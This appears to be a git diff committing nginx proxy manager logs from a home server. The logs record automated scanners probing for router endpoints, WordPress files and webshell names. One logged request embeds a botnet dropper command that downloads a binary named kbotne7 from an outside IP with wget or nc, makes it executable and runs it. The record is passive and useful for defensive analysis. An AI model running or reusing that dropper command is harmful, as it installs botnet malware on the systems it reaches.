+[02/Feb/2026:20:11:29 +0000] 404 - GET http 78.131.122.113 "/HNAP1/" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[02/Feb/2026:20:16:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:20:18:50 +0000] 400 - GET http 78.131.122.113 "/" [Client 194.187.176.71] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" +[02/Feb/2026:20:18:50 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 194.187.176.150] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" +[02/Feb/2026:20:26:31 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:20:26:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:20:32:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 93.170.123.148] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" "-" +[02/Feb/2026:20:38:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 54.211.187.245] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[02/Feb/2026:20:39:04 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:20:52:14 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:20:56:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:20:57:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:20:59:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:21:13:39 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:21:18:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:21:21:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:21:28:40 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:21:34:50 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 160.30.172.107] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:21:34:54 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 160.30.172.107] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:21:43:26 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" diff --git a/proxy-manager/data/logs/fallback_access.log.1.gz b/proxy-manager/data/logs/fallback_access.log.1.gz new file mode 100755 index 0000000..89b7d1e Binary files /dev/null and b/proxy-manager/data/logs/fallback_access.log.1.gz differ diff --git a/proxy-manager/data/logs/fallback_access.log.2.gz b/proxy-manager/data/logs/fallback_access.log.2.gz new file mode 100755 index 0000000..a1336e2 Binary files /dev/null and b/proxy-manager/data/logs/fallback_access.log.2.gz differ diff --git a/proxy-manager/data/logs/fallback_access.log.3.gz b/proxy-manager/data/logs/fallback_access.log.3.gz new file mode 100755 index 0000000..67d8d30 Binary files /dev/null and b/proxy-manager/data/logs/fallback_access.log.3.gz differ diff --git a/proxy-manager/data/logs/fallback_error.log b/proxy-manager/data/logs/fallback_error.log new file mode 100755 index 0000000..de88293 --- /dev/null +++ b/proxy-manager/data/logs/fallback_error.log @@ -0,0 +1,9298 @@ +2026/01/11 22:49:00 [error] 191#191: *17 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 79.133.126.183, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "92.249.249.197:80" +2026/01/11 23:22:34 [error] 190#190: *202 open() "/var/www/html/style.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:34 [error] 190#190: *202 open() "/var/www/html/wp-content/style.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-content/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:35 [error] 190#190: *202 open() "/var/www/html/wp-content/themes/style.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:35 [error] 190#190: *202 open() "/var/www/html/wp-admin/style.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:35 [error] 190#190: *202 open() "/var/www/html/wp-includes/style.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:35 [error] 190#190: *202 open() "/var/www/html/chosen.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /chosen.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:35 [error] 190#190: *202 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:35 [error] 190#190: *202 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:36 [error] 190#190: *202 open() "/var/www/html/gifclass.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /gifclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:36 [error] 190#190: *202 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:36 [error] 190#190: *202 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:36 [error] 190#190: *202 open() "/var/www/html/blurbs.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /blurbs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:36 [error] 190#190: *202 open() "/var/www/html/akcc.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /akcc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:36 [error] 190#190: *202 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:37 [error] 190#190: *202 open() "/var/www/html/shelp.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /shelp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:37 [error] 190#190: *202 open() "/var/www/html/cord.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /cord.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:37 [error] 190#190: *202 open() "/var/www/html/dex.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /dex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:37 [error] 190#190: *202 open() "/var/www/html/wp-admin/admin-ajax.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/admin-ajax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:37 [error] 190#190: *202 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:37 [error] 190#190: *202 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET //zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:38 [error] 190#190: *202 open() "/var/www/html/wp-admin/zwso.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:38 [error] 190#190: *202 open() "/var/www/html/wp-content/plugins/hellopress/wp_mna.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_mna.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:38 [error] 190#190: *202 open() "/var/www/html/bolt.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /bolt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:38 [error] 190#190: *202 open() "/var/www/html/shlo.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /shlo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:38 [error] 190#190: *202 open() "/var/www/html/133.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /133.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:38 [error] 190#190: *202 open() "/var/www/html/ahax.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /ahax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:39 [error] 190#190: *202 open() "/var/www/html/php8.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /php8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:39 [error] 190#190: *202 open() "/var/www/html/lufix1.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /lufix1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:39 [error] 190#190: *202 open() "/var/www/html/witmm.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /witmm.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:39 [error] 190#190: *202 open() "/var/www/html/wp-admin/css/index.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:39 [error] 190#190: *202 open() "/var/www/html/wp-content/plugins/index.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:39 [error] 190#190: *202 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-content/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:40 [error] 190#190: *202 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:40 [error] 190#190: *202 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:40 [error] 190#190: *202 open() "/var/www/html/files.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /files.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:40 [error] 190#190: *202 open() "/var/www/html/wp-editor.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-editor.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:40 [error] 190#190: *202 open() "/var/www/html/txets.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:40 [error] 190#190: *202 open() "/var/www/html/wp-content/txets.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-content/txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:41 [error] 190#190: *202 open() "/var/www/html/wp-admin/txets.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/txets.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:41 [error] 190#190: *202 open() "/var/www/html/postnews.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:41 [error] 190#190: *202 open() "/var/www/html/wp-content/postnews.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-content/postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/11 23:22:41 [error] 190#190: *202 open() "/var/www/html/wp-admin/postnews.php" failed (2: No such file or directory), client: 104.28.214.116, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/postnews.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 00:05:45 [error] 190#190: *212 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/home.asp" +2026/01/12 01:00:03 [error] 190#190: *237 open() "/var/www/html/cgi-bin/php/login_check.php" failed (2: No such file or directory), client: 79.133.126.183, server: localhost-nginx-proxy-manager, request: "POST /cgi-bin/php/login_check.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 01:35:25 [error] 191#191: *258 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 64.227.100.25, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "92.249.249.197" +2026/01/12 01:35:25 [error] 191#191: *259 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 64.227.100.25, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "92.249.249.197" +2026/01/12 01:35:26 [error] 191#191: *260 open() "/var/www/html/t4" failed (2: No such file or directory), client: 64.227.100.25, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "92.249.249.197" +2026/01/12 01:35:26 [error] 191#191: *261 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 64.227.100.25, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "92.249.249.197" +2026/01/12 01:35:28 [error] 192#192: *1749 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 64.227.100.25, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "92.249.249.197" +2026/01/12 01:35:28 [error] 192#192: *1750 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 64.227.100.25, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "92.249.249.197" +2026/01/12 01:35:28 [error] 190#190: *1751 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 64.227.100.25, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "92.249.249.197" +2026/01/12 01:38:00 [error] 190#190: *1752 open() "/var/www/html/shell" failed (2: No such file or directory), client: 79.133.126.183, server: localhost-nginx-proxy-manager, request: "GET /shell?cd+/tmp+||+cd+/var/tmp;rm+-rf+kbotne7;wget+-q+-O+kbotne7+http:/\/2.56.245.78/lala/kbotne7+||+busybox+wget+-q+-O+kbotne7+http:/\/2.56.245.78/lala/kbotne7+||+nc+2.56.245.78+1007+>+kbotne7+||+toybox+nc+2.56.245.78+1007+>+kbotne7;chmod+777+kbotne7+||+chmod+x+kbotne7;./kbotne7+jaws HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 01:42:59 [error] 190#190: *1755 open() "/var/www/html/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:00 [error] 190#190: *1755 open() "/var/www/html/xmlrpc.php" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /xmlrpc.php?rsd HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:00 [error] 190#190: *1755 open() "/var/www/html/blog/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:00 [error] 190#190: *1755 open() "/var/www/html/web/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:01 [error] 190#190: *1755 open() "/var/www/html/wordpress/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:01 [error] 190#190: *1755 open() "/var/www/html/website/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:01 [error] 190#190: *1755 open() "/var/www/html/wp/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:01 [error] 190#190: *1755 open() "/var/www/html/news/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:02 [error] 190#190: *1755 open() "/var/www/html/2018/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:02 [error] 190#190: *1755 open() "/var/www/html/2019/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:02 [error] 190#190: *1755 open() "/var/www/html/shop/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:02 [error] 190#190: *1755 open() "/var/www/html/wp1/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:03 [error] 190#190: *1755 open() "/var/www/html/test/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:03 [error] 190#190: *1755 open() "/var/www/html/media/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:03 [error] 190#190: *1755 open() "/var/www/html/wp2/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:03 [error] 190#190: *1755 open() "/var/www/html/site/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:04 [error] 190#190: *1755 open() "/var/www/html/cms/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 01:43:04 [error] 190#190: *1755 open() "/var/www/html/sito/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 45.94.31.58, server: localhost-nginx-proxy-manager, request: "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 03:37:26 [error] 191#191: *1779 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 03:58:43 [error] 191#191: *1783 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 40.124.175.225, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "92.249.249.197" +2026/01/12 04:05:54 [error] 191#191: *1786 open() "/var/www/html/ReportServer" failed (2: No such file or directory), client: 40.124.174.209, server: localhost-nginx-proxy-manager, request: "GET /ReportServer HTTP/1.1", host: "92.249.249.197" +2026/01/12 05:21:05 [error] 210#210: *1954 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:05 [error] 210#210: *1954 open() "/var/www/html/rymmm.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /rymmm.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:05 [error] 210#210: *1954 open() "/var/www/html/ws34.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ws34.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:05 [error] 210#210: *1954 open() "/var/www/html/ws45.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ws45.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:06 [error] 210#210: *1954 open() "/var/www/html/xxw.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /xxw.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:06 [error] 210#210: *1954 open() "/var/www/html/ws33.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ws33.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:06 [error] 210#210: *1954 open() "/var/www/html/lm13.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /lm13.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:06 [error] 210#210: *1954 open() "/var/www/html/ws38.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ws38.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:07 [error] 210#210: *1954 open() "/var/www/html/xeqdlun.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /xeqdlun.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:07 [error] 210#210: *1954 open() "/var/www/html/ws37.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ws37.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:07 [error] 210#210: *1954 open() "/var/www/html/ws36.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ws36.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:07 [error] 210#210: *1954 open() "/var/www/html/xinder.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /xinder.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:08 [error] 210#210: *1954 open() "/var/www/html/rendi59.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /rendi59.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:08 [error] 210#210: *1954 open() "/var/www/html/test/lm.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /test/lm.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:08 [error] 210#210: *1954 open() "/var/www/html/style2.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /style2.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:08 [error] 210#210: *1954 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //alfa.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:09 [error] 210#210: *1954 open() "/var/www/html/wpupex.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wpupex.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:09 [error] 210#210: 